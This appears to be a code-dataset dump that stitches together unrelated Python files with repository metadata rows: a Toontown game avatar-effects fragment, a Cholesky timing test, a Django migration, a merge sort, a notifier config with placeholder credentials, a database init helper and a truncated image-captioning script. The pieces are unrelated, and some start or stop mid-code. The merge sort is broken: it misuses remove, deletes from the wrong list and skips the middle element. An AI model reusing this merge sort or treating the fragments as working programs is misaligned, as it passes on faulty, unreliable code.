cogSeq = Sequence(Func(cog.addActive), Func(cog.headsUp, self), Func(cog.reparentTo, render), cogFlyIn, Func(cog.setChatAbsolute, TTLocalizer.GreenEffectPhase, CFSpeech | CFTimeout), ActorInterval(cog, 'victory'), Func(cog.loop, 'neutral'), Wait(1), Func(self.cleanupGreenEffect, cog))
seq.append(cogSeq)
seq.start()
self.storeInterval(seq, intervalName)
return
if toonId == 2:
if self.isDisguised:
if self.isCog not in ToontownGlobals.PutOnSuitToonHead:
cog = ToontownAvatarUtils.createCog(self.suit.style.name, 0, 8, self.getZ(self), self.getH(), 0, 0, parent=self, isSkelecog=self.suit.isSkeleton, isWaiter=self.suit.isWaiter, isVirtual=self.suit.isVirtual, isSkeleRevive=self.suit.isSkeleRevive, colorType=self.nametag.getColorCode(), level=self.cogLevels[SuitDNA.suitDepts.index(SuitDNA.getSuitDept(self.suit.style.name))] + 1)
cog.wrtReparentTo(hidden)
cogFlyIn = cog.beginSupaFlyMove(VBase3(cog.getX(), cog.getY(), cog.getZ()), 1, 'flyIn')
seq = Sequence(Func(cog.addActive), Func(cog.headsUp, self), Func(cog.reparentTo, render), cogFlyIn, Func(cog.setChatAbsolute, TTLocalizer.GreenEffectPhase, CFSpeech | CFTimeout), ActorInterval(cog, 'victory'), Func(cog.loop, 'neutral'), Wait(1), Func(self.cleanupGreenEffect, cog))
seq.start()
self.storeInterval(seq, intervalName)
return
else:
toon = ToontownAvatarUtils.createUniqueToon(self.getName(), self.style.asTuple(), self.hat, self.glasses, self.backpack, self.shoes, 0, 8, self.getZ(self), self.getH(), parent=self, isDisguised=True, suitType=self.suit.style.name, suitDept=self.suit.style.dept, isWaiter=self.suit.isWaiter, isRental=self.suit.isRental, colorType=self.nametag.getColorCode(), cogLevels=self.getCogLevels(), cheesyEffect=self.cheesyEffect)
toon.wrtReparentTo(hidden)
cogFlyIn = toon.getSuitTeleport(moveIn=1, startPos=(toon.getX(), toon.getY(), toon.getZ()))
seq = Sequence(Func(toon.addActive), Func(toon.headsUp, self), Func(toon.reparentTo, render), cogFlyIn, Func(toon.setChatAbsolute, TTLocalizer.GreenEffectPhase, CFSpeech | CFTimeout), ActorInterval(toon.suit, 'victory'), Func(toon.suit.loop, 'neutral'), Wait(1), Func(self.cleanupGreenEffect, toon, 1))
seq.start()
self.storeInterval(seq, intervalName)
return
else:
toon = ToontownAvatarUtils.createUniqueToon(self.getName(), self.style.asTuple(), self.hat, self.glasses, self.backpack, self.shoes, 0, 5, self.getZ(self), self.getH(), 0, 0, parent=self, colorType=self.nametag.getColorCode(), cheesyEffect=self.cheesyEffect, nametagStyle=self.nametagStyle)
toon.wrtReparentTo(hidden)
if toon.style.getAnimal() == 'bear':
angryToonSFX = loader.loadSfx('phase_3.5/audio/dial/AV_bear_exclaim.ogg')
else:
angryToonSFX = loader.loadSfx('phase_3.5/audio/sfx/avatar_emotion_angry.ogg')
toonTeleportIn = Sequence(Func(toon.animFSM.request, 'TeleportIn'), Wait(1.517), Func(toon.animFSM.request, 'neutral'))
seq = Sequence(Parallel(Func(toon.reparentTo, render), Func(toon.addActive)), Func(toon.headsUp, self), toonTeleportIn, Func(toon.setChatAbsolute, OTPLocalizer.SpeedChatStaticTextToontown.get(905), CFSpeech | CFTimeout), Parallel(SoundInterval(angryToonSFX, loop=1, node=toon), Sequence(Func(toon.angryEyes), Func(toon.blinkEyes), ActorInterval(toon, 'angry'), Func(toon.normalEyes), Func(toon.blinkEyes), Func(toon.loop, 'neutral')), Wait(3)), Func(toon.setChatAbsolute, TTLocalizer.GreenEffectPhase, CFSpeech | CFTimeout), ActorInterval(toon, 'hypnotize'), Func(self.cleanupGreenEffect, toon, 1))
seq.start()
self.storeInterval(seq, intervalName)
return
else:
if toonId != 0:
toon = ToontownAvatarUtils.createToon(toonId, 0, 5, self.getZ(self), self.getH(), 0, 0, parent=self)
toon.wrtReparentTo(hidden)
if toon.style.getAnimal() == 'bear':
angryToonSFX = loader.loadSfx('phase_3.5/audio/dial/AV_bear_exclaim.ogg')
else:
angryToonSFX = loader.loadSfx('phase_3.5/audio/sfx/avatar_emotion_angry.ogg')
toonTeleportIn = Sequence(Func(toon.animFSM.request, 'TeleportIn'), Wait(1.517), Func(toon.animFSM.request, 'neutral'))
seq = Sequence(Parallel(Func(toon.reparentTo, render), Func(toon.addActive)), Func(toon.headsUp, self), toonTeleportIn, Func(toon.setChatAbsolute, OTPLocalizer.SpeedChatStaticTextToontown.get(905), CFSpeech | CFTimeout), Parallel(SoundInterval(angryToonSFX, loop=1, node=toon), Sequence(Func(toon.angryEyes), Func(toon.blinkEyes), ActorInterval(toon, 'angry'), Func(toon.normalEyes), Func(toon.blinkEyes), Func(toon.loop, 'neutral')), Wait(3)), Func(toon.setChatAbsolute, TTLocalizer.GreenEffectPhase, CFSpeech | CFTimeout), ActorInterval(toon, 'hypnotize'), Func(self.cleanupGreenEffect, toon, 1))
seq.start()
self.storeInterval(seq, intervalName)
return
else:
if character == 'panda':
panda = Actor.Actor('phase_3/models/char/panda', {'walk': 'phase_3/models/char/panda-walk'})
panda.setBlend(frameBlend=base.settings.getBool('game', 'smooth-animations', False))
panda.setTransparency(1)
panda.setPosHpr(self.getX(), self.getY(), self.getZ(), self.getH() - 180, 0, 0)
panda.setScale(0.5)
walkNode = NodePath('Panda3DWalkNode')
walkNode.setPosHpr(self.getX(), self.getY(), self.getZ(), self.getH() - 180, 0, 0)
seq = Sequence(Func(panda.reparentTo, render), Func(panda.loop, 'walk'), Parallel(LerpColorScaleInterval(panda, 1.0, colorScale=VBase4(1, 1, 1, 1), startColorScale=VBase4(1, 1, 1, 0)), LerpPosInterval(panda, 5.0, (0,
-25,
0), other=walkNode), Sequence(Wait(4), LerpScaleInterval(panda, 1.0, 0))), Func(self.cleanupGreenEffect, panda, 2, walkNode))
seq.start()
self.storeInterval(seq, intervalName)
return
cog = ToontownAvatarUtils.createCog(character, 0, 8, self.getZ(self), self.getH(), 0, 0, parent=self)
cog.wrtReparentTo(hidden)
cogFlyIn = cog.beginSupaFlyMove(VBase3(cog.getX(), cog.getY(), cog.getZ()), 1, 'flyIn')
seq = Sequence(Func(cog.addActive), Func(cog.headsUp, self), Func(cog.reparentTo, render), cogFlyIn, Func(cog.setChatAbsolute, TTLocalizer.GreenEffectPhase, CFSpeech | CFTimeout), ActorInterval(cog, 'victory'), Func(cog.loop, 'neutral'), Wait(1), Func(self.cleanupGreenEffect, cog))
seq.start()
self.storeInterval(seq, intervalName)
return
def cleanupGreenEffect(self, character, type=0, node=None):
if character:
if type == 1:
if character.isDisguised:
if self.isCog != 0 and self.isCog != 5 and self.isCog != 9:
cogFlyOut = character.beginSupaFlyMove(VBase3(character.getX(), character.getY(), character.getZ()), 0, 'flyOut')
seq = Sequence(cogFlyOut, Func(character.reparentTo, hidden), Func(character.cleanup), Func(character.removeActive), Func(character.removeNode))
else:
cogFlyOut = character.getSuitTeleport(moveIn=0)
seq = Sequence(cogFlyOut, Func(character.reparentTo, hidden), Func(character.cleanup), Func(character.removeActive), Func(character.removeNode))
else:
seq = Sequence(Func(character.animFSM.request, 'TeleportOut'), Wait(character.getDuration('teleport') + 1.0), Func(character.reparentTo, hidden), Func(character.stopBlink), Func(character.cleanup), Func(character.removeActive), Func(character.removeNode))
elif type == 2:
seq = Sequence(Func(character.reparentTo, hidden), Func(character.cleanup), Func(character.removeNode), Func(node.removeNode))
else:
cogFlyOut = character.beginSupaFlyMove(VBase3(character.getX(), character.getY(), character.getZ()), 0, 'flyOut')
seq = Sequence(cogFlyOut, Func(character.reparentTo, hidden), Func(character.cleanup), Func(character.removeActive), Func(character.removeNode))
seq.start()
def cleanupGreenEffectIntervals(self):
intervalName = 'GreenSeq'
for key in self.activeIntervals.keys():
if intervalName in key:
self.clearInterval(key)
def generateSnapEffect(self):
from toontown.battle import BattleParticles
from toontown.battle import MovieSuitAttacks
headEffect = BattleParticles.createParticleEffect('RubOut', color=(0, 0, 0,
1))
torsoEffect = BattleParticles.createParticleEffect('RubOut', color=(0, 0, 0,
1))
legsEffect = BattleParticles.createParticleEffect('RubOut', color=(0, 0, 0,
1))
animal = self.style.getAnimal()
bodyScale = ToontownGlobals.toonBodyScales[animal]
def toonFacePoint(toon, zOffset=0, parent=render):
pnt = toon.getPos(parent)
pnt.setZ(pnt[2] + toon.shoulderHeight + 0.3 + zOffset)
return Point3(pnt)
headEffectHeight = toonFacePoint(self).getZ()
legsHeight = ToontownGlobals.legHeightDict[self.style.legs] * bodyScale
torsoEffectHeight = ToontownGlobals.torsoHeightDict[self.style.torso] * bodyScale / 2 + legsHeight
legsEffectHeight = legsHeight / 2
effectX = headEffect.getX()
effectY = headEffect.getY()
headEffect.setPos(effectX, effectY - 1.5, headEffectHeight)
torsoEffect.setPos(effectX, effectY - 1, torsoEffectHeight)
legsEffect.setPos(effectX, effectY - 0.6, legsEffectHeight)
headParts = self.getHeadParts()
torsoParts = self.getTorsoParts()
legsParts = self.getLegsParts()
headTrack = MovieSuitAttacks.getPartTrack(headEffect, 0, 2.0, [headEffect, self, 0])
torsoTrack = MovieSuitAttacks.getPartTrack(torsoEffect, 0, 2.0, [torsoEffect, self, 0])
legsTrack = MovieSuitAttacks.getPartTrack(legsEffect, 0, 2.0, [legsEffect, self, 0])
def hideParts(parts):
track = Parallel()
for partNum in xrange(0, parts.getNumPaths()):
nextPart = parts.getPath(partNum)
track.append(Func(nextPart.setTransparency, 1))
track.append(LerpFunctionInterval(nextPart.setAlphaScale, fromData=1, toData=0, duration=2.0))
return track
def showParts(parts):
track = Sequence()
for partNum in xrange(0, parts.getNumPaths()):
nextPart = parts.getPath(partNum)
track.append(LerpFunctionInterval(nextPart.setAlphaScale, fromData=0, toData=1, duration=2.0))
track.append(Func(nextPart.clearTransparency))
return track
snap = Sequence(Wait(2.5), Parallel(hideParts(headParts), hideParts(torsoParts), hideParts(legsParts), headTrack, torsoTrack, legsTrack), Wait(2), Parallel(showParts(headParts), showParts(torsoParts), showParts(legsParts)))
snap.start()
def generateOboeEffect(self):
oboe = base.loader.loadSfx('phase_14.5/audio/sfx/oboe.ogg')
base.playSfx(oboe, node=self)
def generateCage(self, doAnim=True):
if self.getLocked():
self.cage = loader.loadModel('phase_14/models/props/outpost_cage')
self.cage.setScale(0.01)
self.cageCameraNode = self.attachNewNode(self.uniqueName('cageCameraNode'))
self.cageCameraNode.setZ(100)
self.cageCameraNode.wrtReparentTo(render)
self.cage.reparentTo(self.cageCameraNode)
if self.isLocal():
base.localAvatar.stopUpdateSmartCamera()
base.camera.reparentTo(self.cageCameraNode)
base.camera.setPosHpr(7.5, 15, 4, 150, 0, 0)
else:
collisions = self.cage.findAllMatches('**/+CollisionNode')
if collisions:
for coll in collisions:
coll.stash()
if doAnim:
dropSfx = loader.loadSfx('phase_5/audio/sfx/cogbldg_drop.ogg')
dropSfx.setPlayRate(2)
landSfx = loader.loadSfx('phase_5/audio/sfx/AA_drop_bigweight.ogg')
cageSeq = Sequence(Func(self.setAnimState, 'neutral'), Func(base.playSfx, dropSfx), Parallel(self.cage.scaleInterval(3.5, (0.2,
0.2,
0.2)), self.cageCameraNode.posInterval(3.5, (self.getX(), self.getY(), self.getZ()))), Func(self.setZ, self.getZ() + 1), Func(base.playSfx, landSfx))
else:
self.cage.setScale(0.2, 0.2, 0.2)
self.cageCameraNode.reparentTo(self)
self.cageCameraNode.setZ(-1)
cageSeq = None
else:
if self.isLocal():
base.camera.reparentTo(base.localAvatar)
base.localAvatar.startUpdateSmartCamera()
if not self.cageCameraNode:
return
kapow = globalPropPool.getProp('kapow')
kapow.setBillboardPointWorld(2)
kapow.setScale(0.75)
kapow.setZ(2)
kapow.reparentTo(self.cageCameraNode)
boomSfx = loader.loadSfx('phase_3.5/audio/sfx/ENC_cogfall_apart.ogg')
cageSeq = Parallel(Parallel(SoundInterval(boomSfx, node=kapow, volume=1), ActorInterval(kapow, 'kapow')), Sequence(Wait(0.75), Func(kapow.removeNode), Func(self.cageCameraNode.removeNode)))
if cageSeq:
cageSeq.start()
self.storeInterval(cageSeq, 'cageSeq')
return
def setLocked(self, locked):
self.locked = locked
if not self.isLocal():
if locked and not self.isGenerated():
self.generateCage(False)
return
if self.isGenerated():
if locked:
self.disableAvatarControls()
self.collisionsOff()
self.disableSleeping()
self.obscureFriendsListButton(1)
self.hideClarabelleGui()
self.laffMeter.hide()
self.book.hideButton()
self.ignoreOnscreenHooks()
base.localAvatar.setTeleportAvailable(0)
base.localAvatar.setTeleportAllowed(0)
base.cr.playGame.getPlace().walkStateData.toggleBook('disable')
if base.cr.propGenerator:
base.cr.propGenerator.disableHotkey()
else:
self.collisionsOn()
self.enableAvatarControls()
self.enableSleeping()
self.obscureFriendsListButton(-1)
self.refreshOnscreenButtons()
self.laffMeter.show()
self.book.showButton()
self.acceptOnscreenHooks()
base.localAvatar.setTeleportAvailable(1)
base.localAvatar.setTeleportAllowed(1)
base.cr.playGame.getPlace().walkStateData.toggleBook('enable')
if base.cr.propGenerator:
base.cr.propGenerator.enableHotkey()
def getLocked(self):
return self.locked
def setMuted(self, muted, timed):
self.muted = muted
if muted:
if timed:
if timed > 1:
message = TTLocalizer.MutedTimedPlural % timed
else:
message = TTLocalizer.MutedTimedSingular % timed
else:
message = TTLocalizer.MutedTrue
else:
message = TTLocalizer.MutedFalse
self.setSystemMessage(0, message, WhisperPopup.WTEmote)
def getMuted(self):
return self.muted
def setTransitioning(self, transitioning):
self.transitioning = transitioning
def getTransitioning(self):
return self.transitioning
def playSound(self, sound, loop=0):
soundWithExt = sound + '.ogg'
bgmPhases = [3, 3.5, 4, 5.5, 6, 7, 8, 9, 10, 11, 12, 13, 14.5]
dialPhases = [3, 3.5, 4, 5.5, 6, 8]
sfxPhases = [3, 3.5, 4, 5, 5.5, 6, 8, 9, 10, 11, 12, 13, 14.5]
bgmSearchPath = DSearchPath()
for phase in bgmPhases:
bgmSearchPath.appendDirectory('/phase_' + str(phase) + '/audio/bgm')
dialSearchPath = DSearchPath()
for phase in dialPhases:
dialSearchPath.appendDirectory('/phase_' + str(phase) + '/audio/dial')
sfxSearchPath = DSearchPath()
for phase in sfxPhases:
sfxSearchPath.appendDirectory('/phase_' + str(phase) + '/audio/sfx')
filename = Filename(soundWithExt)
found = vfs.resolveFilename(filename, bgmSearchPath)
if found:
music = base.loader.loadMusic(filename.getFullpath())
base.playMusic(music, looping=loop, volume=0.8)
if not music.getLoop():
taskMgr.doMethodLater(music.length() + 1, self.playZoneMusic, self.taskName('play-zone-music'))
else:
found = vfs.resolveFilename(filename, dialSearchPath)
if not found:
found = vfs.resolveFilename(filename, sfxSearchPath)
if not found:
self.notify.warning('%s not found on:' % soundWithExt)
print bgmSearchPath
print dialSearchPath
print sfxSearchPath
else:
sfx = base.loader.loadSfx(filename.getFullpath())
base.playSfx(sfx, looping=loop, volume=0.8)
def playZoneMusic(self, task):
place = base.cr.playGame.getPlace()
if place:
base.playMusic(place.loader.music, looping=1, volume=0.8)
return task.done
def doTeleport(self, hood):
place = base.cr.playGame.getPlace()
if place:
place.doTeleport(hood)
def setToonScale(self, scale):
previousScale = self.toonScale
self.toonScale = scale
scaleTime = abs(previousScale - scale) / 2
scaleSeq = self._Toon__doToonScale(scale, scaleTime)
if self.isLocal():
scaleSeq.append(Sequence(Func(self.initCameraPositions), Func(self.resetCameraPosition)))
scaleSeq.start()
def getToonScale(self):
return self.toonScale
def setCarActive(self, carActive):
self.carActive = carActive
if self.isGenerated():
self.updateCarActive()
def getCarActive(self):
return self.carActive
def canRaceHere(self):
if self.getHp() <= 10:
return False
place = base.cr.playGame.place
if not place:
return False
from toontown.safezone.Playground import Playground
from toontown.town.Street import Street
from toontown.coghq.CogHQExterior import CogHQExterior
from toontown.coghq.FactoryExterior import FactoryExterior
from toontown.coghq.LawbotOfficeExterior import LawbotOfficeExterior
return isinstance(place, Playground) or isinstance(place, CogHQExterior) or isinstance(place, Street) or isinstance(place, FactoryExterior) or isinstance(place, LawbotOfficeExterior)
def updateCarActive(self):
if self.carActive:
if not self.carInterest and self.canRaceHere():
self.getDustCloud(0.0, scale=0.8).start()
self.carInterest = base.cr.addInterest(self.doId, [100], 'kart-%d' % self.doId)
else:
if self.carInterest:
if self.isGenerated():
self.getDustCloud(0.0, scale=0.8).start()
base.cr.removeInterest(self.carInterest)
self.carInterest = None
return
def setLoop(self, anim, start, end, part):
start = start if start != -1 else None
end = end if end != -1 else None
part = part if part else None
if self.getIsTransformed():
geom = self.getActiveTransformation()
geom.loop(anim, fromFrame=start, toFrame=end, partName=part)
else:
self.loop(anim, fromFrame=start, toFrame=end, partName=part)
return
def setPingPong(self, anim, start, end, part):
start = start if start != -1 else None
end = end if end != -1 else None
part = part if part else None
if self.getIsTransformed():
geom = self.getActiveTransformation()
geom.pingpong(anim, fromFrame=start, toFrame=end, partName=part)
else:
self.pingpong(anim, fromFrame=start, toFrame=end, partName=part)
return
def setPose(self, anim, frame, part):
part = part if part else None
if self.getIsTransformed():
geom = self.getActiveTransformation()
geom.pose(anim, frame, part)
else:
self.pose(anim, frame, part)
return
def storeInterval(self, interval, name):
if name in self.activeIntervals:
name = name + str(len(self.activeIntervals.keys()))
self.activeIntervals[name] = interval
def cleanupIntervals(self):
for interval in self.activeIntervals.values():
interval.finish()
DelayDelete.cleanupDelayDeletes(interval)
self.activeIntervals = {}
def clearInterval(self, name, finish=1):
if self.activeIntervals.has_key(name):
ival = self.activeIntervals[name]
if finish:
ival.finish()
else:
ival.pause()
if self.activeIntervals.has_key(name):
DelayDelete.cleanupDelayDeletes(ival)
del self.activeIntervals[name]
else:
self.notify.debug('interval: %s already cleared' % name)
def finishInterval(self, name):
if self.activeIntervals.has_key(name):
interval = self.activeIntervals[name]
interval.finish()
def isPlayerControlled(self):
return True
def setUnlocks(self, unlocks):
self.unlocks = unlocks
def getUnlocks(self):
return self.unlocks
|
[
"[email protected]"
] | |
eac46b0f2d21a6532ee402e63d5d7d49626ae549
|
6f86dc36bd4bcf53fb4dfe7208db5c7220dce0bc
|
/test_cholesky.py
|
474aa34840863ce930a7f8e1e601ebaddadc4338
|
[] |
no_license
|
ElfenStomp/Projet2_algonum
|
5950b3fb89bf83e5f13bf43e48140d709ea49b1b
|
19aff4bdefa7f571956df45dac9555cf068793a5
|
refs/heads/master
| 2021-01-22T07:23:26.210564 | 2017-03-11T12:44:34 | 2017-03-11T12:44:34 | 81,814,660 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,976 |
py
|
import numpy as np
import time
import matplotlib.pyplot as plt
from matplotlib.legend_handler import HandlerLine2D
import sdp_matrix as sdp
import cholesky as cho
##Test incomplete cholesky and cholesky
def test_cholesky_incomplet():
n = 100
nb_extra_diag = ((n**2) // 2) - n - 1
t1 = np.arange(0, nb_extra_diag, 50)
t2=[]
t3=[]
l=len(t1)
for i in range(0, nb_extra_diag, 50):
A=sdp.matrice_SDP(n, i)
tmps=time.time()
cho.cholesky(A)
t2.append(time.time()-tmps)
tmps=time.time()
cho.cholesky_incomplet(A)
t3.append(time.time()-tmps)
plt.figure(1)
plt.subplot(211)
line1, =plt.plot(t1, t2, color="blue", label="Choleski")
line2, =plt.plot(t1, t3, color="red", label="Cholesky incomplet")
plt.legend(handler_map={line1: HandlerLine2D(numpoints=4)})
plt.xlabel("Nombre de termes extra-diagonaux")
plt.ylabel("Temps d'execution (en seconde)")
plt.show()
##PARTIE_1
#1.Cholesky
A=np.array([[1, 1, 1, 1], [1, 5, 5, 5], [1, 5, 14, 14], [1, 5, 14, 15]])
print("Matrice A :")
cho.display(A)
print("Cholesky(A) :")
cho.display(cho.cholesky(A))
"""Complexite: (n**3)/6 additions et multiplications, (n*(n-1))/2 divisions, n evaluations de racines carrees. Donc la complexite est en teta(1/3 *n**3)."""
#2.
"""
1. L'algorithme de Cholesky à une compléxité en O(n**3).
2. A * x = b
-> L * L_t * x = b n**3 (Cholesky)
-> L * y = b n**2 (Pivot descendant)
-> L_t * x = y n**2 (Pivot montant)
Au final la complexite est de l'ordre de O(n**3)
"""
#3.Creation de matrice SDP
"""Prend en entree la taille de la matrice souhaitee et le nombre de termes extra-diagonaux (<n**2/2)"""
print("Matrice SDP de taille 5 avec 3 termes extra-diagonaux non nuls :")
cho.display(sdp.matrice_SDP(5, 3))
#4.Cholesky incomplet
test_cholesky_incomplet()
#TODO: calculer la complexité
#5.
cho.preconditionneur(A)
|
[
"[email protected]"
] | |
19ee46eafd56767062c10f852b133d62639531f8
|
ac3339c95afe9066d66ff009fb1b7c3fde927ee6
|
/Python/06_Django/02_Django/07_UserDashboard/apps/app_main/migrations/0002_auto_20170624_1918.py
|
55dd4e0299c385a3e6d10cf49ee03da56d3f5511
|
[] |
no_license
|
aakasht05/DojoAssignments
|
5d5013700528084fd17f93ebaea55d20aeea2d9d
|
227f6deb62e75e07243ec9058d8557973b03840e
|
refs/heads/master
| 2021-05-03T15:46:39.527638 | 2018-04-13T05:59:38 | 2018-04-13T05:59:38 | 120,479,335 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 708 |
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.2 on 2017-06-24 19:18
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.manager
class Migration(migrations.Migration):
dependencies = [
('app_main', '0001_initial'),
]
operations = [
migrations.AlterModelManagers(
name='user',
managers=[
('UserManager', django.db.models.manager.Manager()),
],
),
migrations.AddField(
model_name='user',
name='description',
field=models.TextField(default=None, max_length=1000),
preserve_default=False,
),
]
|
[
"[email protected]"
] | |
bbbe89c1a80c1289601bc6dae809de7b4cd5e5d6
|
fbacac402e2272e0664eda587cdb085cde0e6a95
|
/Python-Codes/MergeSort.py
|
ceb9c7a3a41f94377eb77024cdf3827ad09ee102
|
[] |
no_license
|
bhandari-nitin/Python-Code
|
e041684777fcbee183d0609856cf2743ed5c7253
|
36b06821c639a79ffc650807d9b03eca4397449e
|
refs/heads/master
| 2020-03-11T17:19:55.274288 | 2018-04-19T02:00:49 | 2018-04-19T02:00:49 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 594 |
py
|
###################
#### Merge Sort####
###################
#Supporting function for merge sort
def merge(a, b):
c = []
while len(a) != 0 and len(b) != 0:
if a[0] < b[0]:
c.append(a[0])
a.remove[a[0]]
else:
c.append(b[0])
c.remove(b[0])
if len(a) == 0:
c += b
else:
c += a
return c
def mergeSort(arr):
if len(arr) ==0 or len(arr) == 1:
return arr
else:
mid = len(arr)/2
a = mergeSort(arr[:mid])
b = mergeSort(arr[mid+1:])
return merge(a, b)
def main():
arr = [45, 23, 1, 44, 77, 0 ,3, 121]
print mergeSort(arr)
if __name__ == '__main__':
main()
|
[
"[email protected]"
] | |
219eae34810f92508e8de57b2ebb97decce009db
|
74f5cf339f3d8233d04d3a0be55231d9105bb983
|
/notifier/config.py
|
2ab3c76b41fbdecf7373a627b9966896ac77a6dc
|
[] |
no_license
|
camvi/sample
|
eac77d9fc8e4d6898894c763917a5195158fb666
|
24a8c0ee53ed87cc20a4e3dc7c11860e91265f27
|
refs/heads/master
| 2020-04-16T12:36:04.430211 | 2019-07-16T20:00:05 | 2019-07-16T20:00:05 | 165,587,135 | 2 | 3 | null | 2019-10-30T23:56:05 | 2019-01-14T03:08:48 |
C++
|
UTF-8
|
Python
| false | false | 399 |
py
|
email_options = {
"from_addr": '',
"from_addr_password": '',
"smtp_server": '',
"smtp_port": 587,
"ssl": False,
"to_addr": "",
"enabled": False
}
twilio_options = {
'sid': '',
'token': '',
'phone': '',
'to_phone': "",
"enabled": False
}
camvi_options = {
"ip": 'localhost',
"port": '8080',
"username": 'admin',
"password": 'admin'
}
|
[
"[email protected]"
] | |
1c97b935612b094e79e1637a5a338585a5833fb8
|
3685ccf0910e7780421a57ca15ca5381510390ea
|
/schema_registry/schema_registry/extensions.py
|
a1795b787268361c9b7348c63bd46a7d77b867fc
|
[] |
no_license
|
winex888/federation_graphql
|
9db3e5d6d75a9433906bb5cff34d7fd043380caa
|
00e296ad36b82083c2e16d4800b59cd6b0e2d66e
|
refs/heads/main
| 2023-08-03T09:37:11.038257 | 2023-07-24T10:28:53 | 2023-07-24T10:28:53 | 360,777,023 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,168 |
py
|
import logging
from schema_registry.api.models import db
from schema_registry.conf import settings
async def init_db(_app) -> None:
"""
Инициализация подключения к бд
"""
logging.info('Подключение к БД... ({db_dsn})'.format(db_dsn=settings.DB_DSN))
await db.set_bind(
settings.DB_DSN,
echo=settings.POSTGRES.echo,
min_size=settings.POSTGRES.pool_min_size,
max_size=settings.POSTGRES.pool_max_size,
ssl=settings.POSTGRES.ssl,
)
try:
await db.scalar('select now()')
logging.info('Подключение к БД прошло успешно')
except ConnectionRefusedError as ex:
logging.error(
'Ошибка подключение к БД... ({db_dsn}), ошибка: {errors}'.format(
db_dsn=settings.DB_DSN,
errors=ex.strerror,
),
)
async def close_db(_app) -> None:
"""
Отключение подключения к бд
"""
logging.info('Отключение подключения к базе дынных...')
await db.pop_bind().close()
|
[
"[email protected]"
] | |
a016251f6e85bb504ee575a1832918e4b6055986
|
a22cd41cfaa1deb1a56149e613ef84d5f6507dbc
|
/Code/main.py
|
c911327676e1df83b26d6838a781e9d95a497cd5
|
[] |
no_license
|
arpanghoshal/ImageCaptionGenerator
|
df5442d65ae2eba1583f7d52a9a0d8b5f9836166
|
4a03e51f4ab14cb780180ffd8df635ddf3bb6cff
|
refs/heads/master
| 2022-04-24T07:53:46.340135 | 2020-04-26T17:08:06 | 2020-04-26T17:08:06 | 258,891,494 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 9,402 |
py
|
#%%
import os
import tensorflow as tf
import cv2
import numpy as np
import os
from matplotlib import pyplot as plt
import random
import pandas as pd
from scipy.sparse import csr_matrix
from scipy.sparse import vstack
import re
#%%
tf.device("/device:GPU:0")
train_images_list = os.listdir('C:/Users/dell/Downloads/Flickr_Data/Flickr_Data/Images/')
sample_size = 30
train_images_list = train_images_list[:sample_size]
size = (256, 256)
num_channels = 3
train = np.array([None] * sample_size)
real_images = np.array([None] * sample_size)
j = 0
for i in train_images_list:
real_images[j] = np.array(plt.imread('C:/Users/dell/Downloads/Flickr_Data/Flickr_Data/Images/' + i))
train[j] = np.array(plt.imread('C:/Users/dell/Downloads/Flickr_Data/Flickr_Data/Images/' + i))
j += 1
j = 0
for i in train:
train[j] = cv2.resize(i, size)
train[j] = train[j].reshape(1, size[0], size[1], num_channels)
j += 1
train = np.vstack(train[:])
plt.imshow(np.squeeze(train[0]))
plt.show()
#%%
train_captions = pd.read_csv('C:/Users/dell/Downloads/Flickr_Data/Flickr_Data/Images/data.csv', delimiter='|')
def get_images_id(names):
names = [int(x.split('_')[-1].split('.')[0]) for x in names]
return names
train_captions.columns = ['image_name', 'comment_number', 'comment']
def images_map_caption(train_images_list, train_captions):
caption = []
for i in train_images_list:
caption.append(train_captions[train_captions['image_name'] == i]['comment'].iat[0])
return caption
captions = np.array(images_map_caption(train_images_list, train_captions))
print(captions.shape)
#%%
start_tag = '<s>'
end_tag = '<e>'
def get_vocab(captions):
arr = []
m = captions.shape[0]
sentence = [None ] * m
j = 0
for i in captions:
i = re.sub(' +',' ',i)
i = start_tag + ' ' + i + ' ' + end_tag
sentence[j] = i.split()
j += 1
arr = arr + i.split()
arr = list(set(arr))
vocab_size = len(arr)
j = 0
fwd_dict = {}
rev_dict = {}
j = 0
for i in arr:
fwd_dict[i] = j
rev_dict[j] = i
j += 1
return vocab_size, sentence, fwd_dict, rev_dict
vocab_size, sentences, fwd_dict, rev_dict = get_vocab(captions)
#%%
m = len(sentences)
train_caption = [None] * m
i = 0
for sentence in sentences:
cap_array = None
for word in sentence:
row = [0]
col = [fwd_dict[word]]
data = [1]
if cap_array is None:
cap_array = csr_matrix((data, (row, col)), shape=(1, vocab_size))
else:
cap_array = vstack((cap_array, csr_matrix((data, (row, col)), shape=(1, vocab_size))))
train_caption[i] = cap_array
i += 1
train_caption[0].shape
#%%
def create_weights(shape, suffix):
return tf.Variable(tf.truncated_normal(shape, stddev=0.7), name='W_' + suffix)
def create_biases(size, suffix):
return tf.Variable(tf.zeros([size]), name='b_' + suffix)
def conv_layer(inp, kernel_shape, num_channels, num_kernels, suffix):
filter_shape = [kernel_shape[0], kernel_shape[1], num_channels, num_kernels]
weights = create_weights(shape=filter_shape, suffix=suffix)
biases = create_biases(num_kernels, suffix=suffix)
layer = tf.nn.conv2d(input=inp, filter=weights, padding='SAME', strides=[1, 1, 1, 1], name='conv_' + suffix)
layer += biases
layer = tf.nn.relu6(layer, name='relu_' + suffix)
#layer = tf.nn.max_pool(layer, ksize=[1, 2, 2, 1], strides=[1, 2, 2,1], padding= 'SAME')
return layer
def flatten_layer(layer, suffix):
layer_shape = layer.get_shape()
num_features = layer_shape[1:4].num_elements()
layer = tf.reshape(layer, [-1, num_features], name='flat_' + suffix )
return layer
def dense_layer(inp, num_inputs, num_outputs, suffix, use_relu=True):
weights = create_weights([num_inputs, num_outputs], suffix)
biases = create_biases(num_outputs, suffix)
layer = tf.matmul(inp, weights) + biases
layer = tf.nn.relu(layer)
return layer
def rnn_cell(Win ,Wout, Wfwd, b, hprev, inp):
h = tf.tanh(tf.add(tf.add(tf.matmul(inp, Win), tf.matmul(hprev, Wfwd)), b))
out = tf.matmul(h, Wo)
return h, out
#%%
learning_rate = 0.0001
training_iters = 5000
display_step = 1000
max_sent_limit = 50
num_tests = 12
bridge_size = 1024
keep_prob = 0.3
x_caption = tf.placeholder(tf.float32, [None, vocab_size], name = 'x_caption')
